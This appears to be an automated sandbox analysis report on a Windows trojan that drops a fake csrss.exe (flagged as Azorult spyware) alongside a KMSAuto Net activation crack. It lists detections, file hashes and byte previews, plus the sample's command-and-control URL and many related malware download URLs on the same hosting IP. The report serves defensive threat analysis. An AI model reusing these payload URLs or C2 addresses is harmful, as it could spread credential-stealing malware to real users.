  • dropped: C:\Users\user\AppData\Roaming\csrss.exe (PE32)
  • dropped: C:\Program Files (x86)\...\KMSAuto Net.exe (PE32)
  • dropped: C:\Users\user\AppData\Local\...\temp_0.tmp (Microsoft)
  • signature: Drops PE files with benign system names
  • csrss.exe started
    • network: f0355889.xsph.ru, 141.8.192.151, ports 49695, 80, SPRINTHOSTRU, Russian Federation
    • signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Overwrites code with unconditional jumps - possibly settings hooks in foreign process; 4 other signatures
    • WerFault.exe started
      • dropped: C:\ProgramData\Microsoft\...\Report.wer (Unicode)
  • KMSAuto Net.exe started
    • cmd.exe started, which started conhost.exe
    • cmd.exe started, which started conhost.exe
    • cmd.exe started, which started conhost.exe

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
Initial Sample
Source | Detection | Scanner | Label
ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | 57% | ReversingLabs | Win32.Trojan.Strictor
ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | 45% | Virustotal |

Dropped Files
Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\csrss.exe | 100% | Avira | TR/Crypt.XPACK.Gen
C:\Users\user\AppData\Roaming\csrss.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\$inst\temp_0.tmp | 100% | Joe Sandbox ML |
C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe | 71% | ReversingLabs | Win32.Hacktool.AutoKMS
C:\Users\user\AppData\Roaming\csrss.exe | 67% | ReversingLabs | Win32.Spyware.Azorult

Unpacked PE Files
Source | Detection | Scanner | Label
1.0.csrss.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
1.2.csrss.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

Domains
No Antivirus matches
Contacted Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
f0355889.xsph.ru | 141.8.192.151 | true | false | | high

Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
http://f0355889.xsph.ru/Panel/index.php | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
141.8.192.151 | f0355889.xsph.ru | Russian Federation | 35278 | SPRINTHOSTRU | false
Joe Sandbox Version:37.0.0 Beryl
Analysis ID:834745
Start date and time:2023-03-25 14:26:09 +01:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 9m 38s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:23
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample file name:ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe
Detection:MAL
Classification:mal100.troj.spyw.evad.winEXE@15/12@1/1
EGA Information:
• Successful, ratio: 33.3%
HDC Information:
• Successful, ratio: 100% (good quality ratio 50%)
• Quality average: 21%
• Quality standard deviation: 12%
HCA Information:
• Successful, ratio: 76%
• Number of executed functions: 20
• Number of non-executed functions: 11
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WerFault.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 104.208.16.94
• Excluded domains from analysis (whitelisted): fs.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, watson.telemetry.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
• Execution Graph export aborted for target ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe, PID 4204 because there are no executed functions
• Execution Graph export aborted for target csrss.exe, PID 5224 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
14:27:15 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
141.8.192.151 | gOKMPhOLiN.exe | malicious | Phoenix Miner, ccminer | f0758246.xsph.ru//zima.php?mine=ETC
141.8.192.151 | DWG Material, Standard BS 4360 GR. 40A43A.jar | malicious | Unknown | f0719949.xsph.ru/dropbox.exe
141.8.192.151 | DWG Material, Standard BS 4360 GR. 40A43A.jar | malicious | Unknown | f0719949.xsph.ru/dropbox.exe
141.8.192.151 | dropbox.exe | malicious | Unknown | f0719949.xsph.ru/Uuddcmhnxqhfgvscgvechrthfvxthbvnjytchegfrhvbrtgnthyfgnbvgfcfbhgfyuyuyuyuyuyuytttrrrfgh
141.8.192.151 | DWG spare parts 455RTMGF Model.exe | malicious | Remcos | f0719949.xsph.ru/Uuddcmhnxqhfgvscgvechrthfvxthbvnjytchegfrhvbrtgnthyfgnbvgfcfbhgfyuyuyuyuyuyuytttrrrfgh
141.8.192.151 | NotaFiscal.msi | malicious | Unknown | f0717271.xsph.ru/serv.php
141.8.192.151 | Revised sales contract for Crosswear.rtf | malicious | Snake Keylogger | f0705964.xsph.ru/mum.exe
141.8.192.151 | cxbqjWw79R.exe | malicious | Xmrig | f0702521.xsph.ru/cmd.php?hwid=computer%5Cuser&gpuname=88P9A4OS;%20&mining=1&active=XMR
141.8.192.151 | IVBPFW.exe | malicious | Unknown | f0702055.xsph.ru/ng.txt
141.8.192.151 | NOPL-25-JULY-001.doc | malicious | Remcos | f0699262.xsph.ru/letter.exe
141.8.192.151 | 300618c6e81ee458a3aba4188f0f24937f62974991428.exe | malicious | RedLine, Remcos, Xmrig | f0699616.xsph.ru/RATTCRYPT.exe
141.8.192.151 | http://f0688845.xsph.ru/index.php | malicious | Unknown | f0688845.xsph.ru/favicon.ico
141.8.192.151 | 18561381.exe | malicious | RedLine | f0645594.xsph.ru/build.exe
141.8.192.151 | bd250e1cb4f8d322a5464549dc067ac7bcbecfc2d4fca.exe | malicious | RedLine Remcos Xmrig | f0641877.xsph.ru/lam1di.exe
141.8.192.151 | 9WPRwZwY47.exe | malicious | RedLine | f0624763.xsph.ru/MicrosoftApi.exe
141.8.192.151 | 2a09Y5NsoG.exe | malicious | Amadey RedLine SmokeLoader Tofsee Vidar | f0611101.xsph.ru/1.exe
141.8.192.151 | NFe_09112021123.msi | malicious | Hidden Macro 4.0 | f0589562.xsph.ru//arqvs//zlibai.dll
141.8.192.151 | VapeV4Installer (2).exe | malicious | Unknown | f0587499.xsph.ru/dop.exe
141.8.192.151 | 7ofFMoirr5.exe | malicious | Raccoon RedLine SmokeLoader | f0589056.xsph.ru/bfs.exe
141.8.192.151 | SecuriteInfo.com.W32.AIDetect.malware1.10225.exe | malicious | Raccoon RedLine SmokeLoader | f0589056.xsph.ru/bfs.exe
                                                                  No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
SPRINTHOSTRU | 9943942BF1ECA23FF0436ACD54810DC44DFF46CA3A8AC.exe | malicious | DCRat | 141.8.197.42
SPRINTHOSTRU | SecuriteInfo.com.Win32.CrypterX-gen.30319.24724.exe | malicious | Stealc, Vidar | 185.251.91.202
SPRINTHOSTRU | 5616zRamIw.exe | malicious | Stealc, Vidar | 185.251.91.202
SPRINTHOSTRU | 2SvK6hF5uE.exe | malicious | Stealc, Vidar | 185.251.91.202
SPRINTHOSTRU | LuI6373nrb.exe | malicious | Stealc, Vidar | 185.251.91.202
SPRINTHOSTRU | J5hFvhir0S.exe | malicious | DCRat | 141.8.192.82
SPRINTHOSTRU | file.exe | malicious | Tofsee | 185.185.68.239
SPRINTHOSTRU | file.exe | malicious | Tofsee | 185.185.68.239
SPRINTHOSTRU | file.exe | malicious | Tofsee | 185.185.68.239
SPRINTHOSTRU | file.exe | malicious | Unknown | 141.8.195.45
SPRINTHOSTRU | wQNd0uhGFZ.exe | malicious | Stealc, Vidar | 185.185.68.241
SPRINTHOSTRU | bER7DKZrkI.exe | malicious | DCRat | 141.8.192.169
SPRINTHOSTRU | OG8UFPwwKq.exe | malicious | DCRat | 141.8.192.169
SPRINTHOSTRU | file.exe | malicious | Tofsee | 185.251.88.202
SPRINTHOSTRU | file.exe | malicious | Tofsee | 185.251.88.202
SPRINTHOSTRU | https://envireaupuits-my.sharepoint.com/:u:/p/rmccormack/Efpu6Jmv2ftGi2xFsVeWXwwB7B62gSLU6hU9cVLt-LpvCQ | malicious | Unknown | 141.8.194.239
SPRINTHOSTRU | qkmDErEpoW.exe | malicious | DCRat | 141.8.194.242
SPRINTHOSTRU | drB8pR4ekw.exe | malicious | DCRat | 141.8.194.164
SPRINTHOSTRU | T8xr0o2njQ.exe | malicious | DCRat | 141.8.194.242
SPRINTHOSTRU | SEjk15RsUj.exe | malicious | DCRat | 141.8.194.242
                                                                  No context
                                                                  No context
                                                                  Process:C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):8767160
                                                                  Entropy (8bit):7.066286542185662
                                                                  Encrypted:false
                                                                  SSDEEP:196608:wokKDywCAfywOweBzcyw3ywsywDywPbywgsywZywRywxywBywEyw4ywwywmIBywI:FywCAqwUBzBwiwxwGwPewgxwUwswMw84
                                                                  MD5:2FB86BE791B4BB4389E55DF0FEC04EB7
                                                                  SHA1:375DC8189059602F9EB571B473D723FAD3AD3D8C
                                                                  SHA-256:B8AEC57F7E9C193FCD9796CF22997605624B8B5F9BF5F0C6190E1090D426EE31
                                                                  SHA-512:3230AB05EB876879AEFC5E15BB726292640C1DDF476E4108F5C8EED2F373CB852964163CCB006E3D22BC1DC2F97AC2DB391AF9B289F21A7B099DF4C4DD94EE38
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                                  Reputation:low
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...S.FX.........."...P.............".... ... ....@.. ..............................jl....`.....................................O.... ..<............................................................................ ............... ..H............text...(... ...................... ..`.rsrc...<.... ......................@..@.reloc..............................@..B........................H.......p%..x"...........G..h.z.P.......................................Z(....(....(.....o....*...( .....(!.....(".....(#.....($...*F.(....o....(%...*..(&...*.s'........s(........s)........s*........s+........*.~....o,...*.~....o-...*.~....o....*.~....o/...*.~....o0...*.~.....(1...,.r...p.....(2...o3...s4........~....*.~....*.......*~(....r-..p~....o5...(6...t....*~(....r?..p~....o5...(6...t....*~(....rG..p~....o5...(6...t....*~(....rW..p~....o5...(6...t....*~(....rg..p~....o
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):6
                                                                  Entropy (8bit):2.2516291673878226
                                                                  Encrypted:false
                                                                  SSDEEP:3:Hy:Hy
                                                                  MD5:9F06243ABCB89C70E0C331C61D871FA7
                                                                  SHA1:FDE773A18BB29F5ED65E6F0A7AA717FD1FA485D4
                                                                  SHA-256:837CCB607E312B170FAC7383D7CCFD61FA5072793F19A25E75FBACB56539B86B
                                                                  SHA-512:B947B99D1BADDD347550C9032E9AB60B6BE56551CF92C076B38E4E11F436051A4AF51C47E54F8641316A720B043641A3B3C1E1B01BA50445EA1BA60BFD1B7A86
                                                                  Malicious:false
                                                                  Preview:test..
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):65536
                                                                  Entropy (8bit):0.9703695093460976
                                                                  Encrypted:false
                                                                  SSDEEP:192:iDpaOoQ9HF/69RjcPqe86/u7svS274ItiQ:i1VoQNFS9RjM/u7svX4ItiQ
                                                                  MD5:9651F04D850960647F97309303F0E260
                                                                  SHA1:887A00908DAF17CB86ED75568CD4FF540D57A21C
                                                                  SHA-256:E3DE4551AD2736C7091C78C723009EB008D4D017B55CB1827306E052FA20A26D
                                                                  SHA-512:75A386D7456CB4C788C0EEFCDD7A83F6B21D014EA992D1672870449DDEFF0D28A0229BB45736DC5179717E633C788FE91E9E1DDD297BDA1D2007966841624396
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: SUSP_WER_Suspicious_Crash_Directory, Description: Detects a crashed application executed in a suspicious directory, Source: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_csrss.exe_f22660799b81b1cdf575f7ba80bebda2d012813c_4666b2e0_0a75e935\Report.wer, Author: Florian Roth (Nextron Systems)
                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.2.4.2.5.3.2.2.7.2.2.5.5.9.2.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.2.4.2.5.3.2.2.8.0.2.2.4.7.2.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.3.7.5.2.e.8.d.-.e.5.6.d.-.4.f.3.9.-.9.4.7.a.-.8.5.2.f.0.0.5.b.8.d.f.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.9.3.8.4.e.6.2.-.7.1.d.6.-.4.e.1.c.-.9.9.1.f.-.9.2.8.e.8.7.6.6.4.4.6.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.c.s.r.s.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.6.8.-.0.0.0.1.-.0.0.1.f.-.8.9.4.9.-.3.5.8.b.6.0.5.f.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.b.a.4.d.8.c.3.2.6.8.9.6.a.4.0.2.f.d.8.9.b.5.6.c.6.e.a.c.5.1.1.0.0.0.0.f.f.f.f.!.0.0.0.0.a.a.2.3.b.c.3.7.9.8.7.a.9.c.8.0.2.b.a.5.3.3.1.5.7.7.7.7.6.e.f.2.a.f.1.d.0.7.d.8.!.c.s.r.s.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.9.2././.
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:Mini DuMP crash report, 14 streams, Sat Mar 25 21:27:07 2023, 0x1205a4 type
                                                                  Category:dropped
                                                                  Size (bytes):85762
                                                                  Entropy (8bit):1.9348886947876553
                                                                  Encrypted:false
                                                                  SSDEEP:384:5/UsRPweZ82SGMFKU5z0M/XHhvZjm6/Q5ZsZKd:5/9YeZ8jTz0odFvce
                                                                  MD5:1D10629EF8FF1A4211596938F06B2BC7
                                                                  SHA1:9F5FE6CB1FE590E02A9AB8F2F551F8A627FB60B8
                                                                  SHA-256:A03757BF415604A8DFF2182F5B9A66DECE1555EA3A1EB6B5151312A51611B37C
                                                                  SHA-512:06EBBB10F0C2E8EA761B86461F37530E2D7CB7CD1B70E69AC935C6A1C3C7431EDDBA8014A46555E21927696EFE1E2F3A9E506B4BA71E2CD8EE2EC398A943C19E
                                                                  Malicious:false
                                                                  Preview:MDMP....... .......+g.d........................`................C..........T.......8...........T............0...........................!...................................................................U...........B.......!......GenuineIntelW...........T.......h...(g.d.............................0..2...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):8320
                                                                  Entropy (8bit):3.694198497609073
                                                                  Encrypted:false
                                                                  SSDEEP:192:Rrl7r3GLNiyp6CV6Y0VZ6ekgmfCSYsjzCprB89bfeb/sfIlejm:RrlsNi86g6Y46NgmfCS/febkfOe6
                                                                  MD5:9C2F42B76BE2BF918ED18EE5DEC7D483
                                                                  SHA1:C6239ED6EBE726D61A61286F31F3BD986E2F4DF6
                                                                  SHA-256:38C842EAE184FFFE3939B215DA28C8D829D0103EBF3F6AC9BAE4A021C0454CFE
                                                                  SHA-512:BC0FA8F0B9328FE62D63849E22A70579BD468A832CFAE4C288F08ADAA698BA1FF07365212C19789B54515F12180FCBE5B6ACC2249D30F38759EE19DF943F5B66
                                                                  Malicious:false
                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.2.2.4.<./.P.i.d.>.......
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):4528
                                                                  Entropy (8bit):4.419731473106937
                                                                  Encrypted:false
                                                                  SSDEEP:48:cvIwSD8zs8JgtWI99BWgc8sqYjB8fm8M4JKH/FRs+q8Q86zU15wd:uITf6iQgrsqYaJKsW6zm5wd
                                                                  MD5:9BD6B6AFDDD8100462915BDFBCEE269E
                                                                  SHA1:02C178C0F529CDF8BB3F312BAA2C0773DEFDAC3D
                                                                  SHA-256:77166162629EF7E8EFC6F1B6D731C1937A9D38C7508EB6B1E24BA9CA1C79FD2E
                                                                  SHA-512:F66D3330C11F0F5DA5A67CC60CE5CF8A238AA3E9259247CC726FDE6F66014A2540490CAFB390837C7901E7059BEE3986E4164D46708500C443AB54267A2F80DD
                                                                  Malicious:false
                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1968877" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                  Process:C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe
                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1017
                                                                  Entropy (8bit):5.232381795490283
                                                                  Encrypted:false
                                                                  SSDEEP:24:UMyxmTedVspf1bZhTWY3GNd8DBSZXud7MwTiKUQsJQKDz6KmH6KZq:UMcmTer6f17Tf3GnmShK7MqiKUYKDuKT
                                                                  MD5:AF6A20FD7DFADCD582CCF2B1BFAAF82B
                                                                  SHA1:056B1DE541D17A522F2595D107A2CB3AAA71A570
                                                                  SHA-256:0BEE97833A70AA9BA271E93226DACE849836C64919FBFE15543D694E219D4AF2
                                                                  SHA-512:66510AA69C7F8D6ED34903E588949BDD2C74DC55D9C1192A7F335757A942B5B52FF2409114CEF1E588F2E05D9C7E0B88BEF396E51D57B704F9803B3ACFF76980
                                                                  Malicious:false
                                                                  Preview:.[Configuration]..Professional=no..AddFunctions=no..NoLogo=no..LogFile=yes..LogFileIP=yes..DebugMode=no..PositionLeft=76..PositionTop=49..TaskWinStatus=no..TaskOffStatus=no..Sounds=yes..DelKMSServer=yes..OfficeActivation=no..Port=1688..AI=43200..RI=43200..ModeAuto=yes..Host=127.0.0.2..Type=0..NoAutoMode=no..ModeHook=no..ModeWD=no..ModeTAP=no..DivertDel=hard..LHost=true..Hook=true..WDivert=true..TAP=true..AutoRes=no..NoAutoNoKMS=no..TAPType=..UsePgD=yes..HookMode=0..InstallKey=false..fakeip=false..Index1=0..Index2=0..Index3=0..Index4=7..Index5=0..Index6=0..Index7=0..Index44=0......[ComboBoxHost]..127.0.0.2..10.3.0.222..127.0.0.3......[ComboBoxWinePID]..RandomKMSPID..05426-00206-471-074136-03-1049-9200.0000-1302016......[ComboBoxOff10ePID]..RandomKMSPID..05426-00096-200-349822-03-1049-9200.0000-1102013......[ComboBoxOff13ePID]..RandomKMSPID..05426-00206-234-321799-03-1049-9200.0000-1202013......[ComboBoxOff16ePID]..RandomKMSPID..05426-00206-437-321799-03-1049-9200.0000-1402016......[Co
                                                                  Process:C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe
                                                                  File Type:Microsoft Cabinet archive data, 36 bytes, at 0x24 "", number 1, 0 datablock, 0 compression
                                                                  Category:dropped
                                                                  Size (bytes):36
                                                                  Entropy (8bit):1.3753156176197312
                                                                  Encrypted:false
                                                                  SSDEEP:3:wDl:wDl
                                                                  MD5:8708699D2C73BED30A0A08D80F96D6D7
                                                                  SHA1:684CB9D317146553E8C5269C8AFB1539565F4F78
                                                                  SHA-256:A32E0A83001D2C5D41649063217923DAC167809CAB50EC5784078E41C9EC0F0F
                                                                  SHA-512:38ECE3E441CC5D8E97781801D5B19BDEDE6065A0A50F7F87337039EDEEB4A22AD0348E9F5B5542B26236037DD35D0563F62D7F4C4F991C51020552CFAE03B264
                                                                  Malicious:false
                                                                  Preview:MSCF....$.......$...................
                                                                  Process:C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe
                                                                  File Type:Microsoft Cabinet archive data, many, 8199794 bytes, 2 files, at 0x2c +A "0" "1", number 1, 421 datablocks, 0x1503 compression
                                                                  Category:dropped
                                                                  Size (bytes):8199794
                                                                  Entropy (8bit):7.999668812958104
                                                                  Encrypted:true
                                                                  SSDEEP:196608:cIqkBPpjIwzMYsK6fg4/Lovsc+eQ5AdlH3sxAPflIKaQ:IkFAYsrfx8vJ+eQAd5sxAPmfQ
                                                                  MD5:5C4070FB5AA07BA7ED668328C8B0B428
                                                                  SHA1:FD82E7A296F18AA08C48CA6B2443F403198C299E
                                                                  SHA-256:1D7185461B65FB6B6502EC6766312340CF0EB31D0F70CA83BB50DAB99AF823C3
                                                                  SHA-512:9A824E09FC43626276DFBAF2E571AC862C2FF315835CC261219933A8106CA670724F138B2C43BB4C79E456748CC421BDB5669EAB7234196FAF107F78CB8F1724
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  Preview:MSCF....r.}.....,...................P.........L.......dOG. .0......L....I....1.rO..x..[......>........=....J!...BA..q....BMR..A.PD.W..{7....fh.h.......Y`3.... 1LF....X.......t.A......<.z...m....su....e..X.^.u..u.{...t...nu...n...f.{`dw...\c.c................*.!...# .dJL.......L.....3 ......uH...8.K.@.|.D..j&[.$<.v.}.......f.d[d/gi/h/...4..].f^S/.`........P..F.i.B..[w./l........@/........W...S....u..................B......?...|.6..'..........v."..=......O.Z.._4....C...........}.......`~..r.F............[.FSF....l.-i..k..q............+......H..........J.?..(...k.@.:...:... (.#...4.H."..G..:.q....4.#..*..*.%.>.T..\....9.&0...U.%..T. h.&*...s5....QL..5....S.<....dW.q@0.c.#.....2.0...'.oC.8Q......`...PL...q...w...#...1..%.My.J$...8o..E`."B.....s....A....@..0.#o..7i..v.....ab...w5.n.q..._L....n.b.!.......,.7.J7i....w.....3.o@>u..U..^$.r.A.....&.p.... .Z_.+.......M._8..}..34..9a...@.f...^.......n.!u..2?.|..w....g.l..D......F...q.V...o.K.o.$..........m..L.N
                                                                  Process:C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):5027840
                                                                  Entropy (8bit):7.950049918944395
                                                                  Encrypted:false
                                                                  SSDEEP:98304:jb0VjUZy2jZW9h0v6LkkDo0zaE22e8chePGMBUuOzlR8ZhHvMe8I3:jKjUZyyPv6LvNmRR8PPcuOzlgtvMe
                                                                  MD5:2A0C555C70EB25094C94E4BA5A6BA131
                                                                  SHA1:AA23BC37987A9C802BA5331577776EF2AF1D07D8
                                                                  SHA-256:CB0E4FFD650EAB6AAD6E30252D4FF8A0DC1F4F4C21227E18CB39A43F38EBA1DF
                                                                  SHA-512:E601BF86A855CFC1107A88AE27E8DBE27D00ECAE99536218A46DB9CF0102F9CD533E1A1B698914C202ED3E9AA681FDAE1E8804407FEE4A781511A9AF7FF2508C
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 67%
                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........PE..L....^B*.....................*.......gJ...........@...........................{..................@....................E.O....9F.@....................................................................................p<.............................CODE....$........................... ..`DATA................................@...BSS.....]................................idata..............................@....vmp0....>-.........................`..`.vmp1... .L.. /...L.................`..`....................................................................................................................................................................@..P........................................................................................................................................................................................................................
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                  Category:dropped
                                                                  Size (bytes):1572864
                                                                  Entropy (8bit):4.293749385976843
                                                                  Encrypted:false
                                                                  SSDEEP:12288:fp8C8LpPuaO/Ehw7Ea5OHCxSvelqKruG6ZOBbdpaKELiNENR8UxNMtz:eC8LpPuaO/Ehw7Z+W
                                                                  MD5:75775F48D48EE4422AE3700E76F93726
                                                                  SHA1:C60F5D6E81406BCA405E0F99CB1879AF5C216927
                                                                  SHA-256:17D4626635666A3A02F313CD1386954D491755BE876A8F4FFAEC05225A0C08EA
                                                                  SHA-512:4A37099C88480C3DA85BBBC79006AF8627DEB44776D4F2A7F5DF8B2F1949F79975112DF6A515B79B44DAFD7CD5B5A7BC07D0DFF4186CFAC49E99925557053216
                                                                  Malicious:false
                                                                  Preview:regfj...j...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm&...`_...............................................................................................................................................................................................................................................................................................................................................7..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                  Category:dropped
                                                                  Size (bytes):28672
                                                                  Entropy (8bit):3.8191681874552565
                                                                  Encrypted:false
                                                                  SSDEEP:768:xYARftx1JJ4JBHFAJGrq6HpukqQVSC9OGMY2hp:LdAjs
                                                                  MD5:B7324CFD72B5EE02DD5A56148095A4A4
                                                                  SHA1:E2C0C5F02EC00469EEA74FE0EB253FC13E7F0AE6
                                                                  SHA-256:59BEC8DD358347930867159D133205522C20E4CF8EBFA99460609DF444776774
                                                                  SHA-512:6C6EEB0C7C3F332135A552666E9FA010FB28C029544C4ED70B0F9CF71909B1E51B532736640309B1ACF30F3478ACE59192AB0C1B5BC487A9784E64FE3400A7D8
